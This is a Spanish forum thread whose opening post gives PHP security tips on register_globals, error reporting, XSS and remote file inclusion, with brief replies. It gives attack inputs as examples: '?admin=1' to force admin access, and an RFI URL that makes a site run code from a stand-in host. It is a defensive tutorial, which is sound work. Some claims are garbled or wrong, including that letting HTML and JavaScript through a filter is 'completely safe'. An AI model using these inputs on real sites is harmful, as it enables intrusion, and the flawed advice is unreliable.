Calificación:
  • 0 voto(s) - 0 Media
  • 1
  • 2
  • 3
  • 4
  • 5
¿Tu PHP es seguro? Tips para asegurar tu sitio
#1
Como la otra vez hubo un post que nos hablaba de seguridad "a secas" ahora les traigo algunos tips para fortalecer sus webs.

A pesar de que muchos programadores y desarrolladores puede que estén implementando PHP en sus sitios, el tema referente a la seguridad es a menudo dejado de lado cuando se construye nuestra web.

El código PHP es un lenguaje que funciona aún con cabos sueltos. Los hackers buscan esos cabos, y en PHP, no son muy difíciles de encontrar. En esta nota te contamos cómo encontrarlos primero para poder repararlos.

La seguridad PHP involucra la minimización de los errores de programación, y la colocación del código apropiado en su lugar para eliminar toda posible vulnerabilidad.

Tipos de Ataque

Existen varios tipos de ataque diferente a los que PHP es particularmente vulnerable. Los dos tipos principales son: ataques humanos y ataques automáticos. Ambos pueden potencialmente devastar un sitio web.

El tipo más común de ataques humanos son molestias menores y suelen ser comunes en sitios de almacenamiento de archivos y foros, tales como el abuso de la política de almacenamiento, difamación, que se dan en sitios como Amazon o Yahoo Answers, y otros abusos similares que no necesariamente involucran la manipulación del código de tu sitio.

Los humanos también pueden detectar huecos de seguridad que les permite acceder a tu código fuente y utilizarlo maliciosamente. Esto puede potencialmente causar daño sustancial en tu sitio, por lo que éste es el tipo de ataque humano en el que deberías concentrarte.

Los ataques automatizados son particularmente peligrosos debido a su eficiencia en el uso de script automáticos para realizar estragos en tu sitio de mucha maneras distintas. Estos ataques puede que hagan lenta tu página, accedan a errores de loggeo, manipulen el código fuente o comprometan a información sensible. Los ataques automatizados más usuales son los virus y gusanos, los cuales tienen una mínima diferencia entre sí pero se asemejan en el gran daño que pueden realizar a tu web.

La meta de la seguridad PHP es minimizar y eliminar ambos de estos posibles ataques al poner inplace líneas estratégicas de defensa para eliminar el acceso a tu sitio de usuarios no-verificados.

Las vulnerabilidades de seguridad PHP más comunes

Los hackers experimentados conocen las fallas de seguridad más usuales que deben buscar en PHP, por lo que es importante encargarse de este tema antes que nada.

1. Register_Globals

Register_Globals hace que escribir aplicaciones PHP sea simple y conveniente para el desarrollador pero también causa un riesgo de seguridad potencial. Esta propiedad está localizada en el archivo de configuración de PHP, el cual se llama php.ini, y este puede ser tanto activado como desactivado. Al activarlo, se permite que los usuarios no-verificados inyecten variables en una aplicación para ganar acceso administrativo a tu web. La mayoría de los expertos PHP recomiendan desactivar register_globals.

Por ejemplo, miren el snippet que sigue. Un usuario podría añadir el final de la url de una página ?admin=1 para básicamente forzar la entrada a áreas administrativas que normalmente requerirían una contraseña.
[Imagen: 83119763.jpg]

Con register_globals desactivado, este tipo de entrada forzada no es posible. La buena noticia es que PHP 4.2.0 posee register_globals desactivado por defecto y PHP 6.0.0 ha directamente ha removido esta función.

Por lo que en lugar de confiar en register_globals, en su lugar deberías utilizar las variables PHP predefinidas tales como $_REQUEST. Para asegurar más el sitio, también deberías especificar utilizando: $_ENV, $_GET, $_POST, $_COOKIE, o $_SERVER en lugar de utilizar el más general $_REQUEST.


2. Reporte de error


Reporte de error es una gran herramienta para el diagnóstico de bugs, permitiéndote arreglarlos fácil y rápidamente, pero también pone en juego temas de seguridad. El problema sucede cuando el error es visible a los otros en la pantalla, porque revela posibles agujeros de seguridad en el código de los cuales un hacker puede tomar provecho sin problemas.

Si display_errors no está desactivado o posee como valor “0″, el resultado del examen aparecerá en el navegador del usuario final… y eso no es nada bueno para la seguridad. Sin embargo, debes activar log_errors y luego indicar la locación exacta del log con error_log.

Échale un vistazo a la tabla de PHPFreaks.com que está a continuación, que señala las propiedades recomendadas tanto para la instancia de de producción como de desarrollo de aplicaciones web PHP.
[Imagen: 48328975.jpg]

3. Cross-Site Scripting (XSS)

Cross-site scripting, o XSS, es una forma de que los hackers reúnan información de tu sitio web utilizando markup malicioso o código JavaScript para engañar al usuario, o a su navegador, para que sigan un link malo o presenten sus detalles de login o un panel de login falso y así robar su información personal. La mejor forma de defensa ante XSS es deshabilitar JavaScript y las imágenes al surfear la web, pero todos sabemos que eso es algo casi imposible con tantos sitios webs utilizando aplicaciones JavaScript hoy en día.

Para defenderte contra los ataques XSS, necesitas ser proactivo, no esperes a que tu sitio sea atacado para actuar. Por ejemplo, las aplicaciones PHP que utilizan formularios de sumisión, o peticiones POST, son mucho menos vulnerables que las peticiones GET. Por lo que es importante que detectes que variables y acciones serán permitidas como valores GET, y también cuales vienen por medio de valores POST. En un nutshell, la defensa contra XSS involucra el control de las entradas de usuarios a tu sitio. Debes asegurarte que éstas pasen a través de un proceso de filtro para que no posean código malicioso.

Un ejemplo del filtro de las entradas de usuario se puede encontrar en el snippet de código que dejamos a continuación tomado de Pro PHP Security porChris Snyder y Michael Southwell.
[Imagen: wrawzm.jpg]

Esta pieza de código relativamente directa permite que html y Javascript sean embebidos en la entrada, lo que determina que la misma sea completamente segura. Esto es especialmente útil en las secciones de comentarios de blogs, foros u otras aplicaciones web que reciben entradas.

Otra cosa útil para proteger contra XSS es una función PHP llamada htmlentities(). Esta función simple convierte todos los caracteres en html a sus entidades correspondientes, tales como “<” se convertiría “<”.

4. Inclusión de archivo remoto (RFI)

Este tipo de ataque es relativamente desconocido entre desarrolladores, lo que hace que sea especialmente dañino. La inclusión de archivo remoto, o RFI, involucra un ataque de una locación remota que explora una aplicación PHP vulnerable e inyecta código malicioso para lograr spamming o incluso acceso a la carpeta ruta del servidor. Un usuario no-verificado que gana acceso a cualquier servidor puede causar problemas mayores en un sitio de distintas formas, incluyendo el abuso de información personal almacenada en las bases de datos.

Un buen ejemplo de un ataque RFI se puede encontrar en PHPFreaks.com. Aquí hay un ejemplo de esa página:
Código:
Imaginen que en http://example.com/malice.php existe un archivo y nuestro script está localizado en http://site.com/index.php. El atacante hará esta petición: http://site.com/index.php?page=http://example.com/malice. Este archivo se ejecutará al ser incluido y escribirá un nuevo archivo en el disco.

La mejor forma de asegurar tu sitio de los ataques RFI es a través de las directivas php.ini - Especificamente, las directivas allow_url_fopen y el allow_url_include. La directiva allow_url_fopen esta activada por defecto, y allow_url_include está desactivada. Estas dos directivas simples protegerán adecuadamente tu sitio de cualquier ataque RFI.

Otras herramientas de seguridad PHP

Si bien la mejor forma de asegurar las aplicaciones web PHP es a través y monitoreo constante de tu sitio, existen otras herramientas útiles que pueden ayudar a reconocer las vulnerabilidades en tu código PHP. Aquí hay tres herramientas útiles que pueden resultar beneficiosas para los desarrolladores PHP:

PhpSecInfo

Esta herramienta reporta información de seguridad en el ambiente PHP, y lo mejor, ofrece sugerencias para mejorar los errores. Se puede descargar bajo la licencia “New BSD”, y el proyecto PhpSecInfo busca constantemente desarrolladores PHP para mejorar esta herramienta.

<!-- m --><a class="postlink" href="http://phpsec.org/projects/phpsecinfo/index.html">http://phpsec.org/projects/phpsecinfo/index.html</a><!-- m -->

PHP Security Scanner

Esta herramienta se utiliza para escanear código PHP para vulnerabilidades, y se puede usar para escanear cualquier directorio. PHP Security Scanner presenta una muy práctica UI para mejorar la visualización de potenciales problemas.

<!-- m --><a class="postlink" href="http://sourceforge.net/projects/securityscanner/">http://sourceforge.net/projects/securityscanner/</a><!-- m -->

Spike PHP Security Audit Tool

La herramienta de seguridad Spike PHP Audit es una solución de código abierto para realizar análisis estáticos de código PHP. Buscará problemas de seguridad, para que puedas corregirlos durante el proceso de desarrollo.

<!-- m --><a class="postlink" href="http://developer.spikesource.com/projects/phpsecaudit/">http://developer.spikesource.com/projects/phpsecaudit/</a><!-- m -->
[Imagen: bann.png]
WWW
#2
Interesante texto Taquión.

Si usan un script serio y estable como joomla, drupal, phpbb, smf, wordpress, etc... no deben tener mayores preocupaciones. Es mejor prestar atención a la configuración del server: permisos, .htaccess y php.

En cambio, si están desarrollando sus aplicaciones, mucho cuidado porq aunq no tengamos nada valioso en nuestra web, algún desaprensivo puede acceder a nuestros archivos y datos borrando toda nuestra web o secuestrándola. No es agradable.
[Imagen: firmabp.jpg][Imagen: mineenlineaentregadispo.jpg]
WWW
#3
Buen aporte de los dos. Grasis Taq y Mine soys unos verdaderos cracks Guiño
WWW
#4
Minenage escribió:Interesante texto Taquión.

Si usan un script serio y estable como joomla, drupal, phpbb, smf, wordpress, etc... no deben tener mayores preocupaciones. Es mejor prestar atención a la configuración del server: permisos, .htaccess y php.

En cambio, si están desarrollando sus aplicaciones, mucho cuidado porq aunq no tengamos nada valioso en nuestra web, algún desaprensivo puede acceder a nuestros archivos y datos borrando toda nuestra web o secuestrándola. No es agradable.

claro, para quien tenga cms, aqui tienen las directivas para proteger su .htacces <!-- l --><a class="postlink-local" href="http://skylium.uni.cc/directivas-de-htaccess-t122.html">directivas-de-htaccess-t122.html</a><!-- l -->
[Imagen: bann.png]
WWW


Posibles temas similares...
Tema Autor Respuestas Vistas Último mensaje
  ¿Cómo construir su primer sitio web en 10 maneras efectivas? CarlosAlberto 33 1,265 29-06-2016, 04:44 AM
Último mensaje: shek
Pregunta Solucionado: Error en mi sitio web Cinepirata 2 293 16-12-2015, 12:40 AM
Último mensaje: Cinepirata
  Estadísticas gratuitos en tiempo real para su sitio web o blog. canpios 2 312 01-02-2015, 09:03 AM
Último mensaje: habacuc78
  script simple para embeber videos en sitio canpios 1 293 18-01-2015, 05:58 AM
Último mensaje: garcon
  [Duda] Abrir enlace al dar click en cualquier sitio Tamatsipatse 1 407 22-11-2014, 08:26 PM
Último mensaje: AbaddonOrmuz
  Cambiar el Zoom de mi sitio web Cine-lan 4 430 17-07-2014, 06:04 PM
Último mensaje: Vicen
  Esto es navegar 99% Seguro y Anónimo Epsilon129 21 2,126 17-11-2013, 07:35 PM
Último mensaje: Filter94
  15 herramientas para poner a prueba tu sitio web bairesre 6 883 25-10-2013, 01:33 AM
Último mensaje: Ortega.joal
  Boton flotante en tu sitio Andryus 9 922 22-10-2013, 06:09 AM
Último mensaje: yayito21
Estrella 5 Webs/Tips que de seguro te ayudan! Jona 3 486 14-06-2013, 07:22 PM
Último mensaje: FullPirata



Usuarios navegando en este tema: 1 invitado(s)